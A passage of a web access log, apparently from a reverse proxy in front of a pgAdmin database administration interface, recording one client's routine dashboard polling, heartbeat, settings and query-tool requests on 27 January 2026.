-] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:07:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:07:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:08:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:08:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:09:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:09:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:10:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:10:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:11:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:11:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:12:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:12:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:12:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:13:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:13:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:14:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:14:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:15:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:15:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:16:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:16:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:17:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:17:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:17:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:18:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:18:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:19:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:19:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:20:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:20:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:21:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:21:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:22:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:22:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:22:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:23:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:23:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:24:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:24:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:25:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:25:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:25:32 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:25:32 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:25:33 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:25:34 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:25:36 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:25:36 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:25:37 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:25:37 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:25:38 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:25:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:25:38 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:25:38 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 545] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:25:38 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:25:40 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:25:42 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:25:43 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:25:44 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:25:46 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:25:48 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:25:48 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:25:48 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:25:50 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:25:52 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:25:53 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:25:58 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:26:03 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:26:08 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:26:13 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:26:18 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:26:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:26:23 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; 